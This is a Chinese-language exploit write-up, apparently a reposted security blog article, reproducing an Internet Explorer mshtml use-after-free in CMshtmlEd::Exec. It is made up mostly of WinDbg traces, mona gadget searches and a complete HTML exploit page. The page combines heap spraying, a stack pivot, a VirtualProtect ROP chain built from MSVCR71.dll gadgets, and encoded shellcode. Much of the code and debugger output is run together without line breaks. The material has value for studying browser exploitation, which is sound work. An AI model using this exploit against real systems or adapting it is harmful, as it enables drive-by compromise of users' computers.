efl=00000246mshtml!CMshtmlEd::Initialize+0x1c:6796a651 6a40            
push    40h0:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a653 esp=043c99a4 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x1e:6796a653 6a08            push    80:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a655 esp=043c99a0 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x20:6796a655 ff351884d367    push    dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005eax=00000000 ebx=0834ef20 ecx=07cfcf30 edx=00000000 esi=08051f78 edi=08051f88eip=6796a65b esp=043c999c ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x26:6796a65b ff1500138067    call    dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005eax=08055fc0 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=08051f78 edi=08051f88eip=6796a661 esp=043c99a8 ebp=043c99bc iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:6796a661 85c0            test    eax,eax

Initialize中申请的地址08055fc0,按g

0:005eax=043c99f0 ebx=0834ef20 ecx=07cfcf30 edx=00000004 esi=0834ef20 edi=00000001eip=6796a5f0 esp=043c99bc ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x18:6796a5f0 8bf8            mov     edi,eax0:005eax=043c99f0 ebx=0834ef20 ecx=07cfcf30 edx=00000004 esi=0834ef20 edi=043c99f0eip=6796a5f2 esp=043c99bc ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x1a:6796a5f2 ff1500138067    call    dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005eax=0601df78 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0834ef20 edi=043c99f0eip=6796a5f8 esp=043c99c8 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CHTMLEditor::AddCommandTarget+0x20:6796a5f8 33f6            xor     esi,esi

申请的地址0601df78,按g

0:005eax=00000000 ebx=0834ef20 ecx=0710ef30 edx=00000000 esi=0601df78 edi=0601df88eip=6796a655 esp=043c99b8 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x20:6796a655 ff351884d367    push    dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005eax=00000000 ebx=0834ef20 ecx=0710ef30 edx=00000000 esi=0601df78 edi=0601df88eip=6796a65b esp=043c99b4 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x26:6796a65b ff1500138067    call    dword ptr [mshtml!_imp__HeapAlloc (67801300)] ds:0023:67801300={ntdll!RtlAllocateHeap (77262dd6)}0:005eax=05afafc0 ebx=0834ef20 ecx=77265dd3 edx=00000000 esi=0601df78 edi=0601df88eip=6796a661 esp=043c99c0 ebp=043c99d4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Initialize+0x2c:6796a661 85c0            test    eax,eax

申请的地址05afafc0 

0:005eax=00000000 ebx=0834ef8c ecx=00000000 edx=0834ef8c esi=0601df78 edi=00000001eip=67a5cd43 esp=043c5e20 ebp=043c5e2c iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x19:67a5cd43 ff351884d367    push    dword ptr [mshtml!g_hProcessHeap (67d38418)] ds:0023:67d38418=002100000:005Breakpoint 4 hiteax=00000000 ebx=0834ef8c ecx=00000000 edx=0834ef8c esi=0601df78 edi=00000001eip=67a5cd49 esp=043c5e1c ebp=043c5e2c iopl=0nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x1f:67a5cd49 ff15fc128067    call    dword ptr [mshtml!_imp__HeapFree (678012fc)] ds:0023:678012fc={kernel32!HeapFree (763bbbd0)}0:005> dd esp043c5e1c  00210000000000000601df78 0601df78043c5e2c  043c5e44 67c60391 0601df78 0834ef20043c5e3c  000000000834efac 043c5e70 67c5bd3a043c5e4c  0601df78 03f78fd8 000000000000000f043c5e5c  0834ef20 0601df78 03f78fd8 0811cfd8043c5e6c  05e6cfd8 043c5e78 67adc0e7 043c5e94043c5e7c  67a445c6 0834ef20 00000000710ef30043c5e8c  000000000604b680 043c5eb0 679f344e

释放的地址0601df78

之后便到了崩溃处

0:005> g(56c.e4c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=0834ef30 edx=0000000d esi=00000000 edi=0601df78eip=67a4503e esp=043c9a24 ebp=043c9a30 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x131:67a4503e 8b7f08          mov     edi,dword ptr [edi+8ds:0023:0601df80=????????

申请释放的过程如下表

浏览器漏洞利用实战

可以看到在第二次mshtml!CHTMLEditor::AddCommandTarget处申请0601df78

在第二次mshtml!CMshtmlEd::Release处释放

在崩溃中重新引用

02
漏洞利用
浏览器漏洞利用实战

关闭页堆(HPA)之后研究一下占位(PS:运行gflags需要用管理员权限打开CMD)

开启页堆:

  • gflags.exe /i xx.exe +hpa

  • gflags.exe /p /enable xx.exe

关闭页堆:

  • gflags.exe /p /disable xx.exe

显示当前开启页堆的程序:

  • gflags.exe /p

mshtml!CMshtmlEd::Exec函数的代码如下

mshtml!CMshtmlEd::Exec:699c4faf 8bff            mov     edi,edi699c4fb1 55              push    ebp699c4fb2 8bec            mov     ebp,esp699c4fb4 53              push    ebx699c4fb5 56              push    esi699c4fb6 57              push    edi699c4fb7 8b7d08          mov     edi,dword ptr [ebp+8]699c4fba 8b4708          mov     eax,dword ptr [edi+8]699c4fbd 8b08            mov     ecx,dword ptr [eax]699c4fbf 50              push    eax699c4fc0 be00010480      mov     esi,80040100h699c4fc5 ff5104          call    dword ptr [ecx+4]699c4fc8 837d1403        cmp     dword ptr [ebp+14h],3699c4fcc 7470            je      mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x23:699c4fce 8b5d10          mov     ebx,dword ptr [ebp+10h]699c4fd1 81fb0e090000    cmp     ebx,90Eh699c4fd7 0f85108d0900    jne     mshtml!CMshtmlEd::Exec+0x2e (69a5dced)mshtml!CMshtmlEd::Exec+0x40:699c4fdd ff751c          push    dword ptr [ebp+1Ch]699c4fe0 8b4708          mov     eax,dword ptr [edi+8]699c4fe3 ff7518          push    dword ptr [ebp+18h]699c4fe6 ff7514          push    dword ptr [ebp+14h]699c4fe9 53              push    ebx699c4fea ff750c          push    dword ptr [ebp+0Ch]699c4fed e8b4feffff      call    mshtml!CHTMLEditor::InternalExec (699c4ea6)699c4ff2 8bf0            mov     esi,eax699c4ff4 85f6            test    esi,esi699c4ff6 7c46            jl      mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x5f:699c4ff8 7444            je      mshtml!CMshtmlEd::Exec+0x131 (699c503e)mshtml!CMshtmlEd::Exec+0x65:699c4ffa b81c090000      mov     eax,91Ch699c4fff 3bd8            cmp     ebx,eax699c5001 0f83fd8c0900    jae     mshtml!CMshtmlEd::Exec+0x72 (69a5dd04)mshtml!CMshtmlEd::Exec+0xf5:699c5007 ff7518          push    dword ptr [ebp+18h]699c500a 53              push    ebx699c500b ff7514          push    dword ptr [ebp+14h]699c500e e8cffeffff      call    mshtml!CMshtmlEd::IsDialogCommand (699c4ee2)699c5013 85c0            test    eax,eax699c5015 8b4708     
     mov     eax,dword ptr [edi+8]699c5018 8b4050          mov     eax,dword ptr [eax+50h]699c501b 0f85708d0900    jne     mshtml!CMshtmlEd::Exec+0x10b (69a5dd91)mshtml!CMshtmlEd::Exec+0x10d:699c5021 53              push    ebx699c5022 e87ee8ffff      call    mshtml!CCommandTable::Get (699c38a5)699c5027 85c0            test    eax,eax699c5029 7425            je      mshtml!CMshtmlEd::Exec+0x12c (699c5050)mshtml!CMshtmlEd::Exec+0x117:699c502b 57              push    edi699c502c ff751c          push    dword ptr [ebp+1Ch]699c502f 8bf0            mov     esi,eax699c5031 ff7518          push    dword ptr [ebp+18h]699c5034 ff7514          push    dword ptr [ebp+14h]699c5037 e820000000      call    mshtml!CCommand::Exec (699c505c)699c503c 8bf0            mov     esi,eaxmshtml!CMshtmlEd::Exec+0x131:699c503e 8b7f08          mov     edi,dword ptr [edi+8]699c5041 8b07            mov     eax,dword ptr [edi]

在mshtml!CMshtmlEd::Exec下一个断点,单步调试,看一下edi的状态

0:000> bp mshtml!CMshtmlEd::Exec0:013> gBreakpoint 0 hiteax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=69978eaceip=699c4faf esp=032b9a3c ebp=032b9a68 iopl=0nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Exec:699c4faf 8bff            mov     edi,edi0:005> peax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=69978eaceip=699c4fb1 esp=032b9a3c ebp=032b9a68 iopl=0nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Exec+0x2:699c4fb1 55              push    ebp......0:005eax=003bf520 ebx=00000000 ecx=6993a4c8 edx=00000000 esi=00391608 edi=003bf520eip=699c4fba esp=032b9a2c ebp=032b9a38 iopl=0nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Exec+0xb:699c4fba 8b4708          mov     eax,dword ptr [edi+8] ds:0023:003bf528=059d22f00:005> !heap -p-a edi    address 003bf520 found in    _HEAP @2d0000      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state003bf508 00150000  [00]   003bf520    00088 - (busy)          mshtml!CMshtmlEd::`vftable'

edi为CMshtmlEd对象,大小为0x88。接着执行到Exec中call mshtml!CCommand::Exec的下一条指令,此时edi指向的对象已经被释放了

0:005> g 0x`699c5037eax=002c7088 ebx=0000001f ecx=002c7088 edx=0000001f esi=002c7088 edi=00304228eip=699c5037 esp=0247971c ebp=02479738 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Exec+0x123:699c5037 e820000000      call    mshtml!CCommand::Exec(699c505c)0:005> !heap -p -a edi    address 00304228 found in    _HEAP @ 210000      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state0030422000120000  [00]   0030422800088 - (busy)          mshtml!CMshtmlEd::`vftable'0:005> peax=00000000 ebx=0000001f ecx=002f3270 edx=0000000d esi=002c7088 edi=00304228eip=699c503c esp=0247972c ebp=02479738 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Exec+0x128:699c503c 8bf0            mov     esi,eax0:005> !heap -p -a edi    address 00304228 found in    _HEAP @ 210000      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state        00304220 0012 0000  [00]   00304228    00088 - (free)

释放的空间大小为0x88(之前调试的时候一直是0x98,因为UST没有关闭)

>"YMjfu0c08u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH".length64>(64*2+2).toString(16)"82"

我们EXP中字符串的长度为64,由于是Unicode(每个字符2字节),再加上2字节的结束符,最后大小为0x82;于是在这个字符串后面再加3个字符,使其大小恰好为0x88,让它完美占位

0:005eax=0033a2f8 ebx=00000000 ecx=6937a4c8 edx=00000000 esi=00311be0 edi=0033a2f8eip=69404fba esp=025e98c4 ebp=025e98d0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0xb:69404fba 8b4708          mov     eax,dword ptr [edi+8] ds:0023:0033a300=00357e080:005> !heap -p -a edi    address 0033a2f8 found in    _HEAP @ 270000      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state0033a2f0 00120000  [00]   0033a2f8    00088 - (busy)          mshtml!CMshtmlEd::`vftable'0:005> dc edi0033a2f8  6937a4c8 00000002 00357e08 003231a0  ..7i.....~5..12.0033a308  003418f8 00000000 00000000 00000000  ..4.............0033a318  00000000 00000000 00000000 00000000  ................0033a328  00000000 00000000 00000000 00000000  ................0033a338  00000000 00000000 00000000 00000000  ................0033a348  00000000 00000000 00000000 00000000  ................0033a358  00000000 00000000 00000000 00000000  ................0033a368  00000000 0033a2f8 00000000 00000000  ......3.........

绕过ASLR

!mona modules

这里选择一个没有开启ASLR的模块MSVCR71.dll,到时候使用它里面的指令片段(gadget)

PS:新安装的系统里根本没有这类没开ASLR的模块=-=,为了测试这个漏洞安装了jdk1.6(MSVCR71.dll随JRE一起安装)

0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D    Module info :0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------0BADF00D    0x69490000 | 0x69f10000 | 0x00a80000 | True   | True    | True  |  True    | True   | 8.00.7600.16385 [IEFRAME.dll] (C:Windowssystem32IEFRAME.dll)0BADF00D    0x7c340000 | 0x7c396000 | 0x00056000 | False  | False   | False |  False   | False  | 7.10.3052.4 [MSVCR71.dll] (C:Program FilesJavajre6binMSVCR71.dll)0BADF00D    0x740e0000 | 0x74119000 | 0x00039000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [MMDevAPI.DLL] (C:Windowssystem32MMDevAPI.DLL)0BADF00D    0x6d440000 | 0x6d44d000 | 0x0000d000 | False  | False   | False |  False   | False  | 6.0.450.6 [jp2ssv.dll] (C:Program FilesJavajre6binjp2ssv.dll)0BADF00D    0x76f90000 | 0x770c6000 | 0x00136000 | True   | True    | True  |  True    | True   | 8.00.7600.16385 [urlmon.dll] (C:Windowssystem32urlmon.dll)0BADF00D    0x73980000 | 0x7399c000 | 0x0001c000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [iphlpapi.DLL] (C:Windowssystem32iphlpapi.DLL)0BADF00D    0x68ed0000 | 0x69487000 | 0x005b7000 | True   | True    | True  |  True    | True   | 8.00.7600.16385 [mshtml.dll] (C:WindowsSystem32mshtml.dll)0BADF00D    0x6ec00000 | 0x6ec30000 | 0x00030000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [wdmaud.drv] (C:Windowssystem32wdmaud.drv)0BADF00D    0x75630000 | 0x7567c000 | 0x0004c000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [apphelp.dll] 
(C:Windowssystem32apphelp.dll)0BADF00D    0x6fbe0000 | 0x6fc67000 | 0x00087000 | True   | True    | True  |  True    | True   | 8.00.50727.4940 [MSVCP80.dll] (C:WindowsWinSxSx86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fcMSVCP80.dll)0BADF00D    0x757a0000 | 0x757ac000 | 0x0000c000 | True   | True    | True  |  True    | True   | 6.1.7601.17514 [MSASN1.dll] (C:Windowssystem32MSASN1.dll)0BADF00D    0x6d740000 | 0x6d797000 | 0x00057000 | False  | False   | False |  False   | False  | 6.0.450.6 [ssv.dll] (C:Program FilesJavajre6binssv.dll)

Heap Spray

不知道为什么这里只能到崩溃处,无法继续执行崩溃之后的语句,而是进入了ntdll!KiUserExceptionDispatcher(从下面的输出看,此时0c0c0c08处的内存还没有被映射,读取失败产生了访问违例,异常因此被送到了异常分发例程)

0:005> g(30c.484): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=05d41388 edx=0000000d esi=00000000 edi=0c0c0c08eip=69715041 esp=03359664 ebp=03359670 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x134:69715041 8b07            mov     eax,dword ptr [edi]  ds:0023:0c0c0c08=????????

后测数据

0:005> !heap -p -a 0c0c0c0c    address 0c0c0c0c found in    _HEAP @ 420000      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state        0c020018 1fffc 0000  [00]   0c020030    fffd0 - (busy VirtualAlloc)

offset=(0c0c0c0c-0c020030)%0x1000/2=5EE

我们在0c0c0c08处写入0c0c0c0c,这样后面call dword ptr [eax+8]就会call [0c0c0c14]了,我们打算在0c0c0c14处放入stack pivot的地址 —–> xchg eax,esp ; retn(至于为什么需要这个,后面解释)

而stack pivot的机器码是 94 c3,在mona上查找一下这个地址在哪

!mona find -s "x94xc3" -m MSVCR71

0x7c3837d5 : "x94xc3" |  {PAGE_READONLY} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:Program FilesJavajre6binMSVCR71.dll)0x7c348b05 : "x94xc3" |  {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:Program FilesJavajre6binMSVCR71.dll)

我们使用第二个地址0x7c348b05,因为第一个地址所在的页面是PAGE_READONLY,没有执行权限

大概结构为offset+padding+stack pivot+rop+padding

开始构建我们的Exp代码

//rop chain generated with mona.py - www.corelan.be         rop_gadgets = unescape(           "" + // #[---INFO:gadgets_to_set_ebp:---] :           "%u6d2c%u7c35" + // 0x7c356d2c : ,# POP EBP # RETN [MSVCR71.dll]           "%u6d2c%u7c35" + // 0x7c356d2c : ,# skip 4 bytes [MSVCR71.dll]           "" + // #[---INFO:gadgets_to_set_ebx:---] :           "%u28bf%u7c34" + // 0x7c3428bf : ,# POP EBX # RETN [MSVCR71.dll]           "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx           "" + // #[---INFO:gadgets_to_set_edx:---] :           "%u44d0%u7c34" + // 0x7c3444d0 : ,# POP EDX # RETN [MSVCR71.dll]           "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx           "" + // #[---INFO:gadgets_to_set_ecx:---] :           "%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]           "%ude03%u7c38" + // 0x7c38de03 : ,# &Writable location [MSVCR71.dll]           "" + // #[---INFO:gadgets_to_set_edi:---] :           "%u02a6%u7c37" + // 0x7c3702a6 : ,# POP EDI # RETN [MSVCR71.dll]           "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]           "" + // #[---INFO:gadgets_to_set_esi:---] :           "%uad9f%u7c34" + // 0x7c34ad9f : ,# POP ESI # RETN [MSVCR71.dll]           "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]           "%u62fb%u7c37" + // 0x7c3762fb : ,# POP EAX # RETN [MSVCR71.dll]           "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]           "" + // #[---INFO:pushad:---] :           "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]           "" + // #[---INFO:extras:---] :           "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]           ""); //  :

最终的EXP代码为

<html>  <body>    <script>      var arrr = new Array();      arrr[0] = window.document.createElement("img");      arrr[0]["src"] = "f";        function alloc(bytes, mystr) {while (mystr.length<bytes) mystr += mystr;                // 6 = 4 + 2return mystr.substr(0, (bytes-6)/2);        }        block_size = 0x1000;        //padding_size = 0x5EE//offset to 0x0c0c0c0c inside our0x1000hex block        padding_size = 0x5EA//offset to 0x0c0c0c08 inside our0x1000hex block        call0c = unescape('%u0c0c%u0c0c');        Padding = '';        NopSlide = '';        NopSlide1 = '';        NopSlide2 = ''        //paddingfor (p = 0; p < padding_size; p++){                 Padding += unescape('%u4141');        }for (c = 0; c < block_size; c++){                 NopSlide += unescape('%u9090');        }        var Shellcode=unescape("%uecd9%u74d9%uf424%uc3bf%u291e%u5dcf%uc929%u42b1%u7d31%u0319%u197d%uc583%u2104%uf0eb%u3e24%u77cd%ub49f%ua5df%u436d%u8311%u20f6%u2320%u407c%uc8cf%ub0f4%u8844%u43f0%u3524%u658a%u7ae1%ufc94%udce2%u2fa5%u3efb%u44c5%ue568%ud122%ud934%ub1a1%u599e%ud3b7%ud354%ua8af%uc431%u45ce%u3026%u1298%ub29d%uca1b%u3bef%ud22a%u68ec%u12c9%u7678%u5d13%u798c%u8a54%u427b%u6826%uc0ac%ufb37%u0ef6%u10b9%uc460%uadb5%u80e6%u30d9%ubf12%ub9e6%u28e5%uf96f%ub4c1%uc211%ucdb8%u10f8%u2835%u5a73%u3d2e%u54ca%u1343%uf73b%u6b64%u8e44%u90de%uee00%u7a38%u8905%u5fa5%u7db8%u605b%u82c3%udaed%u1434%u8882%ua564%u6232%u0b57%ueca7%u20e2%u9f42%u1d3c%u0304%uab19%u5a9c%u5437%ua6cb%u6831%u1da4%ucee9%ude08%u126d%u4cb7%u759a%u8f48%ue1a5%u50ee%ud17a%uf466%u6818%u9e12%ue3aa%u3db2%u2862%u9ec2%uc6a0%ufd5a%u8ec1%u227c%u4632%u4018%uf34b%uf28a%u95c2%uca29%ue1dd%u08e2%u78d6%u611b%u2834%ud38f%u33ea%ue5ff%u9bca%u53ff%u41c3");        //rop chain generated with mona.py - www.corelan.be         rop_gadgets = unescape("" + //#[---INFO:gadgets_to_set_ebp:---] :           "%u6d2c%u7c35" + // 0x7c356d2c : ,# POP EBP # RETN [MSVCR71.dll]           "%u6d2c%u7c35" + // 0x7c356d2c : ,# skip 4 bytes [MSVCR71.dll]           "" + 
// #[---INFO:gadgets_to_set_ebx:---] :           "%u28bf%u7c34" + // 0x7c3428bf : ,# POP EBX # RETN [MSVCR71.dll]           "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx           "" + // #[---INFO:gadgets_to_set_edx:---] :           "%u44d0%u7c34" + // 0x7c3444d0 : ,# POP EDX # RETN [MSVCR71.dll]           "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx           "" + // #[---INFO:gadgets_to_set_ecx:---] :           "%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]           "%ude03%u7c38" + // 0x7c38de03 : ,# &Writable location [MSVCR71.dll]           "" + // #[---INFO:gadgets_to_set_edi:---] :           "%u02a6%u7c37" + // 0x7c3702a6 : ,# POP EDI # RETN [MSVCR71.dll]           "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]           "" + // #[---INFO:gadgets_to_set_esi:---] :           "%uad9f%u7c34" + // 0x7c34ad9f : ,# POP ESI # RETN [MSVCR71.dll]           "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]           "%u62fb%u7c37" + // 0x7c3762fb : ,# POP EAX # RETN [MSVCR71.dll]           "%ua151%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]           "" + // #[---INFO:pushad:---] :           "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]           "" + // #[---INFO:extras:---] :           "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]           ""); //  :        stack_pivot = "u8b05u7c34"; // 0x7c348b05        ret = "u7f98u7c34"        pop_ret = "u7f97u7c34" //pop eax ,ret        rop_gadgets  = rop_gadgets + NopSlide.substring(0, 32);        var OBJECT = Padding + call0c + ret + pop_ret + stack_pivot + rop_gadgets + Shellcode + NopSlide.substring(0, block_size - Padding.length - Shellcode.length - rop_gadgets.length - 4*4/2 );;        //alert(OBJECT.length);        OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb(0x10000-32)        //bp mshtml!CFormElement::DoReset+0xe4        //alloc         var evil = new Array();       
 for (var k = 0; k < 150; k++) {                evil[k] = OBJECT.substr(0, OBJECT.length);        }        </script>    <iframe src="./payload.html"></iframe>  </body></html>

注意点:

  1. offset=0x5EA是到0c0c0c08的偏移,在0c0c0c08处写入0c0c0c0c,这样后面的call [eax+8]就会调用stack_pivot

  2. Rop链处的VirtualProtect地址要+0x11变为0x7c37a151(0x7c37a140+0x11),因为后面的gadget多带了一个add al,0ef,要抵消它对al的影响

03
漏洞总结

这个漏洞主要是payload.html中的字符串使edi变为0c0c0c08,随后mov eax,dword ptr [edi]会把edi指向的值赋给eax。而后面的调用call [eax+8],显然就是call [0c0c0c14],因此关键在于我们放在0c0c0c14处的值

首先明确几点

padding_offset为0x5EA,即到0c0c0c08的偏移;EXP.html中紧随padding之后写入的0c0c0c0c,就是为了让[edi]处的值赋给eax时eax为0c0c0c0c,方便后面的栈翻转(stack pivot)


原文始发于微信公众号(Sec探索者):【漏洞复现】浏览器漏洞利用实战

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。